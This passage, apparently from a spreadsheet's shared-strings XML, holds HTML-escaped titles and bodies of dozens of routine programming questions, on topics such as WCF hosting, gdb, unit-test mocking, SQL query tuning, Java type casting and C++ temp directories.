    <t>Host files or stream data on a self-hosted WCF (non-IIS) service that uses HTTP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to host custom data on self-hosted HTTP-configured WCF services, such as custom HTML or XML files, without involving IIS? Iâ€™m speaking of a ServiceHost instance that instantiates its own EndPoints/listeners.&lt;/p&gt;
&lt;p&gt;I have an app that uses a self-hosted WCF service and it has a Windows Forms client but Iâ€™m looking at adding a lightweight Silverilght interface as well, but I donâ€™t want to use IIS for the same reason as I didnâ€™t want to use full-blown SQL Server -- I'm trying to make the whole thing self-packaged without IIS dependencies. (Yes, I know that not involving IIS isnâ€™t best practice as it will make it somewhat less reliable and less flexible, but this feature isnâ€™t a major part of this.)&lt;/p&gt;
&lt;p&gt;If this is not possible, Iâ€™ll have to choose between full-blown IIS on the server or full-blown WPF on the client, I was just curious if anyone had uncovered this before.&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Jon &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using gdb, display multiple vars in one line?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I ask to &lt;em&gt;display&lt;/em&gt; multiple vars in one line? So I want to get output like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;30      if(s[i] != '\0')
5: s[i] = 101 'e'
4: exp = 14
3: val = 123.45
2: sign = 1
1: i = 6
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've been typing in disp s[i] ENTER disp exp ENTER (etc, etc) and I just know there's got to be a better way to do this in one line of typing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to properly mock and unit test</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm basically trying to teach myself how to code and I want to follow good practices. There are obvious benefits to unit testing. There is also much zealotry when it comes to unit-testing and I prefer a much more pragmatic approach to coding and life in general. As context, I'm currently writing my first "real" application which is the ubiquitous blog engine using asp.net MVC. I'm loosely following the MVC Storefront architecture with my own adjustments. As such, this is my first real foray into mocking objects. I'll put the code example at the end of the question.&lt;/p&gt;
&lt;p&gt;I'd appreciate any insight or outside resources that I could use to increase my understanding of the fundamentals of testing and mocking. The resources I've found on the net are typically geared towards the "how" of mocking and I need more understanding of the where, why and when of mocking. If this isn't the best place to ask this question, please point me to a better place.&lt;/p&gt;
&lt;p&gt;I'm trying to understand the value that I'm getting from the following tests. The UserService is dependent upon the IUserRepository. The value of the service layer is to separate your logic from your data storage, but in this case most of the UserService calls are just passed straight to IUserRepository. The fact that there isn't much actual logic to test could be the source of my concerns as well. I have the following concerns.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It feels like the code is just testing that the mocking framework is working. &lt;/li&gt;
&lt;li&gt;In order to mock out the dependencies, it makes my tests have too much knowledge of the IUserRepository implementation. Is this a necessary evil? &lt;/li&gt;
&lt;li&gt;What value am I actually gaining from these tests? Is the simplicity of the service under test causing me to doubt the value of these tests. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I'm using NUnit and Rhino.Mocks, but it should be fairly obvious what I'm trying to accomplish.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    [SetUp]
    public void Setup()
    {
        userRepo = MockRepository.GenerateMock&amp;lt;IUserRepository&amp;gt;();
        userSvc = new UserService(userRepo);
        theUser = new User
        {
            ID = null,
            UserName = "http://joe.myopenid.com",
            EmailAddress = "joe@joeblow.com",
            DisplayName = "Joe Blow",
            Website = "http://joeblow.com"
        };
    }
    [Test]
    public void UserService_can_create_a_new_user()
    {
        // Arrange
        userRepo.Expect(repo =&amp;gt; repo.CreateUser(theUser)).Return(true);
        // Act
        bool result = userSvc.CreateUser(theUser);
        // Assert
        userRepo.VerifyAllExpectations();
        Assert.That(result, Is.True, 
          "UserService.CreateUser(user) failed when it should have succeeded");
    }
    [Test]
    public void UserService_can_not_create_an_existing_user()
    {
        // Arrange
        userRepo.Stub(repo =&amp;gt; repo.IsExistingUser(theUser)).Return(true);
        userRepo.Expect(repo =&amp;gt; repo.CreateUser(theUser)).Return(false);
        // Act
        bool result = userSvc.CreateUser(theUser);
        // Assert
        userRepo.VerifyAllExpectations();
        Assert.That(result, Is.False, 
            "UserService.CreateUser() allowed multiple copies of same user to be created");
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>a simple regexp validator</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do a I create a validator, which has these simple rules. An expression is valid if &lt;/p&gt;
&lt;p&gt;it must start with a letter&lt;br /&gt;
it must end with a letter&lt;br /&gt;
it can contain a dash (minus sign), but not at start or end of the expression  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Adding scripting security to an application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have an existing application written in Java which I wish to add scripting support to. This is fairly trivial with Groovy (and just as trivial in .Net with any of the Iron range of dynamic languages).&lt;/p&gt;
&lt;p&gt;As trivial as adding the support is, it raises a whole host of questions about script execution and security - and how to implement that security.&lt;/p&gt;
&lt;p&gt;Has anyone come across any interesting articles/papers or have any insights into this that they'd like to share? In particular I'd be very interested in architectural things like execution contexts, script authentication, script signing and things along those lines... you know, the kind of stuff that prevents users from running arbitrary scripts they just happened to download which managed to screw up their entire application, whilst still allowing scripts to be useful and flexible.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Quick Edit&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I've mentioned signing and authentication as different entities because I see them as different aspects of security.&lt;/p&gt;
&lt;p&gt;For example, as the developer/supplier of the application I distribute a signed script. This script is legitimately "data destructive" by design. Such as it's nature, it should only be run by administrators and therefore the vast majority of users/system processes should not be able to run it. This being the case it seems to me that some sort of security/authentication context is required based on the actions the script performs and who is running that script.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to read inline styling of an element?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Howdy all.  I'd like to know if it's possible to determine what &lt;strong&gt;inline styling&lt;/strong&gt; has been attributed to an HTML element.  I do not need to retrieve the value, but rather just detect if it's been set inline or not.&lt;/p&gt;
&lt;p&gt;For instance, if the HTML were:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div id="foo" style="width: 100px; height: 100px; background: green;"&amp;gt;&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I determine that "width," "height," and "background" have been explicitly declared, inline?&lt;/p&gt;
&lt;p&gt;As far as I can tell, the solution can work two ways.  I can ask it if a specific attribute is set and it will tell me true or false, or it can tell me all attributes that have been set.  Like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var obj = document.getElementById('foo');
obj.hasInlineStyle('width');  //returns true;
obj.hasInlineStyle('border'); //returns false;
//or
obj.getInlineStyles();   //returns array with values:
                       // 'width' 'height' and 'background'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm not interested in css attributes that are inherited via declarations in a stylesheet, only inline styles.  One last thing, I have no control over the HTML source.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Comparing two integers without any comparison</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to find the greatest of two integers without any comparison? I found some  solutions: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if(!(a/b)) // if a is less than b then division result will be zero.
{
    cout &amp;lt;&amp;lt; " b is greater than a";
}
else if (!(a-b)) // we know a is greater than or equal to b now.  check whether they are equal.
{
    cout &amp;lt;&amp;lt; "a and b are equal";
}
else
    cout &amp;lt;&amp;lt; "a is greater than b";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But if(c) or if(!c) is a comparison to zero. In addition it doesn't work for negative numbers. In fact I need a solution that avoids any if statement. Instead I should use switch statements and arithmetic operators. ThanX.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problems with big query and subquery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I thought that I'll be clever and use subquery to get my &lt;a href="http://stackoverflow.com/questions/470992/how-to-count-number-of-different-items-in-sql#471152"&gt;report&lt;/a&gt; in one go. But after running into problems and reading documentation I saw that my approach does not work in MySQL. My inner query returns ~100 records and outer query scans 20000 records.
When I restricted outer query to 20 records then it run 20 sec - really slow.&lt;/p&gt;
&lt;p&gt;I wonder is it possible to restructure it somehow so that inner query wouldn't be run EVERY time for every record in the outer query?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select p1.surname ,p1.name,p1.id,r1.start_date,r1.end_date,c1.short_name
FROM ejl_players p1
left JOIN ejl_registration r1 ON ( r1.player_id = p1.id )
left JOIN ejl_teams t1 ON ( r1.team_id = t1.id )
left JOIN ejl_clubs c1 ON ( t1.club_id = c1.id )
where  r1.season=2008
and p1.id in
 (
SELECT p.id
FROM ejl_players p 
left JOIN ejl_registration r ON (r.player_id = p.id) 
left JOIN ejl_teams t ON (r.team_id = t.id) 
left JOIN ejl_clubs c ON (t.club_id = c.id)
WHERE r.season = 2008
GROUP BY p.id
HAVING COUNT(DISTINCT c.id)  &amp;gt; 1
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Explain (I restricted outer query to maximum 20 records:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;id  select_type  table  type  possible_keys  key  key_len  ref  rows  Extra  
1 PRIMARY p1 range PRIMARY PRIMARY 4 NULL 19 Using where 
1 PRIMARY r1 ref team_id,season season 10 const,d17528sd14898.p1.id 1 Using where 
1 PRIMARY t1 eq_ref PRIMARY PRIMARY 4 d17528sd14898.r1.team_id 1   
1 PRIMARY c1 eq_ref PRIMARY PRIMARY 4 d17528sd14898.t1.club_id 1   
2 DEPENDENT SUBQUERY p index PRIMARY PRIMARY 5 NULL 23395 Using index 
2 DEPENDENT SUBQUERY r ref team_id,season season 10 const,d17528sd14898.p.id 1 Using where; Using index 
2 DEPENDENT SUBQUERY t eq_ref PRIMARY PRIMARY 4 d17528sd14898.r.team_id 1   
2 DEPENDENT SUBQUERY c eq_ref PRIMARY PRIMARY 4 d17528sd14898.t.club_id 1 Using index
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>iPhone Mic volume</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way to poll the mic input volume with AVFoundation? I have seen the CoreAudio examples like SpeakHere but I really only need the current value. Is CA my only option?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the File Permission Signs @ and + for?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My mac has folders Shared and Public folders. Their permissions are drwxr-xr-x+ for Public and drwxrwxrwt@ for Shared. What do the signs + and @ mean?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Need help in refreshing the page after submit</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing an web application following the 3 tier architecture.When i am hitting on submit button data is storing in database but not showing response message like "Record submitted successfully" and fields are not refreshing. Here is my code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected void BtnSubmit_Click(object sender, EventArgs e)
    {
        if (!Page.IsValid)
            return;
        NewuserBAL NUB = new NewuserBAL();    
        string UserName = TxtUserName.Text;
        string Password = PWD.Text;
        string EmailId = Email.Text;
        try
        {
            NUB.newinsert(UserName, Password, EmailId);
            Response.Write("&amp;lt;b&amp;gt;New User Created Successfully&amp;lt;/b&amp;gt;");
            TxtUserName.Text = "";
            PWD.Text = "";
            CnfrmPwd.Text = "";
            Email.Text = "";
        }
        catch
        {
            throw;
        }
        finally
        {
            NUB = null;
        }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks,
Masum&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Control camera via Firewire</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Some SONY Cameras have a &lt;a href="http://en.wikipedia.org/wiki/Firewire" rel="nofollow"&gt;FireWire&lt;/a&gt; interface.&lt;/p&gt;
&lt;p&gt;Is it possible to control any &lt;strong&gt;camera&lt;/strong&gt; functions via FireWire using any &lt;a href="http://www.unibrain.com/Products/DriverAPI/FireAPI.html" rel="nofollow"&gt;FireWire SDK&lt;/a&gt; etc?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Tape:&lt;/strong&gt; record/stop, forward/rewind&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Lens:&lt;/strong&gt; exposure, zoom, shutter speed, focus, white balance&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Other:&lt;/strong&gt; effects (sepia/invert)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Found:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://www.adobe.com/products/premiere/" rel="nofollow"&gt;Adobe Premiere&lt;/a&gt; can &lt;a href="http://www.manifest-tech.com/premiere/dvcapture.htm#DV%20Device%20Control" rel="nofollow"&gt;control &lt;strong&gt;Tape&lt;/strong&gt; playback&lt;/a&gt; functions (play, forward/rewind)&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>SQL Server column relationships</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got two tables.&lt;/p&gt;
&lt;p&gt;One is "Corporations" (e.g., one record is for Taco Bell). The index and PK for this table is named "Id".&lt;/p&gt;
&lt;p&gt;I've got another table: "Branches" (e.g., one record is for Los Angeles). The Branch table has a column named "Corporation". This column should only accept an "Id" value that corresponds with an "Id" in the "Corporations" table.&lt;/p&gt;
&lt;p&gt;How do I enforce this? Do I add a constraint? How do I do that?&lt;/p&gt;
&lt;p&gt;If I'm barking up the wrong tree, how do I define this relationship between Corporations and Branches?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to access an iteration-counter in Java's for-each loop?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way in Java's for-each loop&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for(String s : stringArray) {
  doSomethingWith(s);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to find out how often the loop has already been processed?&lt;/p&gt;
&lt;p&gt;Aside from using using the old and well-known &lt;code&gt;for(int i=0; i &amp;lt; boundary; i++)&lt;/code&gt; - loop, is the construct&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int i = 0;
for(String s : stringArray) {
  doSomethingWith(s);
  i++;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the only way to have such a counter available in a for-each loop?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Array functions in jQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using jQuery in my web application. I want to use arrays, but I am not able to find out functions for arrays (add, remove or append elements in array) in jQuery. Is there any link related to jQuery array functions which will explain the jQuery array functions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Primitive type 'short' - casting in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a question about the primitive type &lt;code&gt;short&lt;/code&gt; in Java. I am using JDK 1.6. &lt;/p&gt;
&lt;p&gt;If I have the following: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;short a = 2;
short b = 3;
short c = a + b;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the compiler does not want to compile - it says that it "cannot convert from int to short" and suggests that I make a cast to &lt;code&gt;short&lt;/code&gt;, so this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;short c = (short) (a + b);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;really works. But my question is why do I need to cast? The values of a and b are in the range of &lt;code&gt;short&lt;/code&gt; - the range of short values is {-32,768, 32767}.
I also need to cast when I want to perform the operations -, *, / (I haven't checked for others).&lt;/p&gt;
&lt;p&gt;If I do the same for primitive type &lt;code&gt;int&lt;/code&gt;, I do not need to cast aa+bb to &lt;code&gt;int&lt;/code&gt;. The following works fine:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int aa = 2;
int bb = 3;
int cc = aa +bb;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I discovered this while designing a class where I needed to add two variables of type short, and the compiler wanted me to make a cast. If I do this with two variables of type &lt;code&gt;int&lt;/code&gt;, I don't need to cast. &lt;/p&gt;
&lt;p&gt;Thank you very much in advance.&lt;/p&gt;
&lt;p&gt;A small remark: the same thing also happens with the primitive type &lt;code&gt;byte&lt;/code&gt;. So, this works:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;byte a = 2;
byte b = 3;
byte c = (byte) (a + b);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but this not:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;byte a = 2;
byte b = 3;
byte c = a + b;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For &lt;code&gt;long&lt;/code&gt;, &lt;code&gt;float&lt;/code&gt;, &lt;code&gt;double&lt;/code&gt;, and &lt;code&gt;int&lt;/code&gt;, there is no need to cast. Only for &lt;code&gt;short&lt;/code&gt; and &lt;code&gt;byte&lt;/code&gt; values. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the idiomatic Python equivalent to Django's 'regroup' template tag?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://docs.djangoproject.com/en/dev/ref/templates/builtins/#regroup"&gt;http://docs.djangoproject.com/en/dev/ref/templates/builtins/#regroup&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I can think of a few ways of doing it with loops but I'd particularly like to know if there is a neat one-liner.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create temp dir that is globally known and that gets automagically removed (C++)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In C++, I have a few functions that need to write to a temp directory. Ideally, only one temp directory gets created that they all write to (to minimize I/O overhead). That directory should be automagically removed when the program exits.&lt;/p&gt;
&lt;p&gt;However, I don't want to deal with creation and removal of the temp directory in the main function because I think only the functions that actually use the directory should be responsible for its creation and removal. And the main function doesn't necessarily know that a temp directory is used at all. &lt;/p&gt;
&lt;p&gt;Here is what I tried (see code below): A getTempDir() function that can be globally called from anywhere creates a directory on its first call only and returns the dir name on every call. On the first call it also creates a static boost::shared_ptr to a little DirRemover object whose destructor will remove the directory. That destructor gets called automatically when the program exits. &lt;/p&gt;
&lt;p&gt;The problem is that it won't call the FileRemover destructor on an unsuccessful exit of the program, or a kill etc. Are there better solutions? &lt;/p&gt;
&lt;p&gt;Here is the code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;std::string getTempDir(){
  static bool alreadyThere = false;
  static std::string name = "";
  if(!alreadyThere){
    // create dir with
    // popen("mktemp -p /tmp","r")) 
    // and store its name in 'name' 
    removeAtEnd(name);
    alreadyThere = true;
  }
  return name;
}
void removeAtEnd(const std::string&amp;amp; name){
  static boost::shared_ptr&amp;lt;DirRemover&amp;gt; remover(new DirRemover(name));
}
struct DirRemover {
  std::string name;
  DirRemover(const std::string&amp;amp; n) : name(n){}
  ~DirRemover(){
    // remove 'name' dir with popen("rm -r ...")
  }
};
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What to use? Digital signature?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Sorry I couldn't find the best heading for this question. Following is my requirement.&lt;/p&gt;
&lt;p&gt;I a working on a project which deals which large amount of money transactions to different account. The system automatically transfers money to accounts of A,B, C etc etc,, But before this is done Some one from A,B or C should approve(electronically) the amount to be transferred.&lt;/p&gt;
&lt;p&gt;What do you think is the best way of doing it? I want the system to send a file (PDF of something) which is digitally signed (?) and the authorised person from A,B and C should check and confirm that the amount is correct.&lt;/p&gt;
&lt;p&gt;Since the amount is high I must make sure the file sent out by the system is not tampered and at the same time I also want to make sure the file (reply) sent by A,B or C is also not tampered . What is the best way to achieve it? Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Friendly Form Validations (Rails)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I checked out &lt;a href="http://stackoverflow.com/questions/361161/rails-form-validation"&gt;both &lt;/a&gt; of &lt;a href="http://stackoverflow.com/questions/423160/rails-form-validation-conditional-bypass"&gt;these&lt;/a&gt; previously-asked questions, and they're a help but not a full solution for my case.&lt;/p&gt;
&lt;p&gt;Essentially I need to validate a user-submitted URL from a form. I've started by validating that it begins with http://, https://, or ftp:// :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Link &amp;lt; ActiveRecord::Base
  validates_format_of [:link1, :link2, :link3, 
        :link4, :link5], :with =&amp;gt; /^(http|https|ftp):\/\/.*/
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That works great for what it's doing, but I need to go these two steps further:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Users should be allowed to leave the form fields blank if needed, and&lt;/li&gt;
&lt;li&gt;If the URL provided by the user does not already start with http:// (say they enter google.com, for example), it should pass the validation but add the http:// prefix while being processed.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I'm having a hard time determining how to make this work cleanly and efficiently.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Something like overloading in PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to accomplish something like this: Call a method, say "turn", and then have "turn" applied differently to different data types, e.g., calling "turn" with a "screwdriver" object/param uses the "turnScrewdriver" method, calling "turn" with a "steeringWheel" object/param uses the "turnSteeringWheel" method, etc. -- different things are being done, but they're both called "turn."&lt;/p&gt;
&lt;p&gt;I'd like to implement this so that the calling code needn't worry about the type(s) involved. In this example, "turn" should suffice to "turn" a "screwdriver", "steeringWheel", or whatever might need to be "turned."&lt;/p&gt;
&lt;p&gt;In C++ I'd do this with overloading -- and C++ would sort things out based on the datatype/signature -- but this doesn't work in PHP.&lt;/p&gt;
&lt;p&gt;Any suggestions as to where should I begin? A switch statement is obvious, but I'm thinking there must be a (more elegant) OO solution. No?&lt;/p&gt;
&lt;p&gt;TIA&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's a reasonable version of Windows to support for a new .Net application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I develop a .Net application that's going to run on WinXP and Vista, as well as on a modern Mac or Linux under Mono, what are older versions of Windows where I will have to start thinking carefully if I want to support them? Does Windows 2000 for example run .Net and is it capable of any version of the runtime? Usually, older systems mean older hardware too, which might also be a problem, I guess.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;: reading Joe's answer made me rephrase my question in the title. If Win 2k already has a lower common denominator with XP than Linux, that pretty much settles it for me. However, I'm still open to more info and will upvote additional helpful facts.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why are there many JRE implementations?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was wondering..There is Sun's JRE, IBM's JRE, BEA's JRE, Oracle's JRE and some more less know JREs in the market.
Why is there so many JRE implementations? Does the fact that Sun opened the Java platforms mean that there will be one open JRE / JDK?  Or are we going towards what happened with Linux and its many distributions ?   &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting user's group name in Windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using a Java program that has to gather info that can be derived from the user's group.&lt;/p&gt;
&lt;p&gt;How can you get a user's group name from windows?  Is it found in a file or is there some method/API for getting it?&lt;/p&gt;
&lt;p&gt;Please help.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Clear file cache to repeat performance testing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What tools or techniques can I use to remove cached file contents to prevent my performance results from being skewed? I believe I need to either completely clear, or selectively remove cached information about file and directory contents.&lt;/p&gt;
&lt;p&gt;The application that I'm developing is a specialised compression utility, and is expected to do a lot of work reading and writing files that the operating system hasn't touched recently, and whose disk blocks are unlikely to be cached.&lt;/p&gt;
&lt;p&gt;I wish to remove the variability I see in IO time when I repeat the task of profiling different strategies for doing the file processing work.&lt;/p&gt;
&lt;p&gt;I'm primarily interested in solutions for Windows XP, as that is my main development machine, but I can also test using linux, and so am interested in answers for that environment too.&lt;/p&gt;
&lt;p&gt;I tried SysInternals &lt;a href="http://technet.microsoft.com/en-us/sysinternals/bb897561.aspx"&gt;CacheSet&lt;/a&gt;, but clicking "Clear" doesn't result in a measurable increase (restoration to timing after a cold-boot) in the time to re-read files I've just read a few times.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Efficient join with a "correlated" subquery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given three tables Dates(date aDate, doUse boolean), Days(rangeId int, day int, qty int) and Range(rangeId int, startDate date) in Oracle&lt;/p&gt;
&lt;p&gt;I want to join these so that Range is joined with Dates from aDate = startDate where doUse = 1 whith each day in Days.&lt;/p&gt;
&lt;p&gt;Given a single range it might be done something like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT rangeId, aDate, CASE WHEN doUse = 1 THEN qty ELSE 0 END AS qty
FROM (
    SELECT aDate, doUse, SUM(doUse) OVER (ORDER BY aDate) day
    FROM Dates 
    WHERE aDate &amp;gt;= :startDAte
) INNER JOIN (
    SELECT rangeId, day,qty
    FROM Days
    WHERE rangeId = :rangeId
) USING (day)
ORDER BY day ASC
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I want to do is make query for all ranges in Range, not just one.&lt;/p&gt;
&lt;p&gt;The problem is that the join value "day" is dependent on the range startDate to be calculated, wich gives me some trouble in formulating a query.&lt;/p&gt;
&lt;p&gt;Keep in mind that the Dates table is pretty huge so I would like to avoid calculating the day value from the first date in the table, while each Range Days shouldn't be more than a 100 days or so.&lt;/p&gt;
&lt;p&gt;Edit: Sample data&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dates                            Days
aDate        doUse               rangeId     day     qty
2008-01-01   1                   1           1       1
2008-01-02   1                   1           2       10
2008-01-03   0                   1           3       8
2008-01-04   1                   2           1       2
2008-01-05   1                   2           2       5
Ranges
rangeId      startDate
1            2008-01-02
2            2008-01-03
Result
rangeId      aDate        qty
1            2008-01-02   1
1            2008-01-03   0
1            2008-01-04   10
1            2008-01-05   8
2            2008-01-03   0
2            2008-01-04   2
2            2008-01-05   5
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Most bandwidth efficient unidirectional synchronise (server to multiple clients)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;What is the most bandwidth efficient way to &lt;em&gt;unidirectionally&lt;/em&gt; synchronise a list of data from one server to many clients?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I have sizeable chunk of data (perhaps 20,000, 50-byte records) which I need to periodically synchronise to a series of clients over the Internet (perhaps 10,000 clients). Records may added, removed or updated &lt;em&gt;only at the server end&lt;/em&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Recursion or iteration?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I love recursion. I think it simplifies things a lot. Another may disagree; I think it also makes the code a lot easier to read. However, I've noticed that recursion is not used as much in languages such C# as they are in LISP (which by the way is my favorite language because of the recursion). &lt;/p&gt;
&lt;p&gt;Does anybody know if there is any good reasons not use recursion in the languages such as C#? Is it more expensive than iteration?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Copy MySQL structure across servers via PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm in need of help - I've got two mysql databases on different servers with a web host, and I need to copy a Joomla installation from one to the other. The problem I have is that the only way I can access the data is via php, as direct odbc connections to the database are locked down.&lt;/p&gt;
&lt;p&gt;I don't mind doing it table by table, but have no idea of how to code the script :(&lt;/p&gt;
&lt;p&gt;My knowledge of php is limited (hence using Joomla), so if anyone has a couple of minutes to point me in the right direction, it'd be appreciated.&lt;/p&gt;
&lt;p&gt;Thanks in advance,&lt;/p&gt;
&lt;p&gt;PG&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to select even or odd elements based on class name</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;if you create html layout like so&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ul&amp;gt;
     &amp;lt;li class='a'&amp;gt;&amp;lt;/li&amp;gt;
     &amp;lt;li class='b'&amp;gt;&amp;lt;/li&amp;gt;
     &amp;lt;li class='a'&amp;gt;&amp;lt;/li&amp;gt;
     &amp;lt;li class='b'&amp;gt;&amp;lt;/li&amp;gt;
     &amp;lt;li class='a'&amp;gt;&amp;lt;/li&amp;gt;
     &amp;lt;li class='b'&amp;gt;&amp;lt;/li&amp;gt;
     &amp;lt;li class='a'&amp;gt;&amp;lt;/li&amp;gt;
     &amp;lt;li class='b'&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and try to select odd elements with 'a' class like so $$('.a:odd') you will get empty array, and if you do $$('.a:even') you will get all four li elements with 'a' class.. It really strange.. But im new to mootools, maybe im doing something wrong..  &lt;/p&gt;
&lt;p&gt;So my question is how to select first and third li elements with a class.
I know that i can do it with function like this&lt;/p&gt;
&lt;p&gt;$$('.a').filter(function(item, index) { return index%2; }&lt;/p&gt;
&lt;p&gt;but its too complicated for such small task as selecting odd or even elements..&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP Error and IIS 7.0</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In IIS 6 ASP errors were displayed with the line number and a description of the problem. For example, &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{call dbo.spGetCommunityInfo(xx)} 
Microsoft SQL Native Client error '80020005' 
Invalid character value for cast specification 
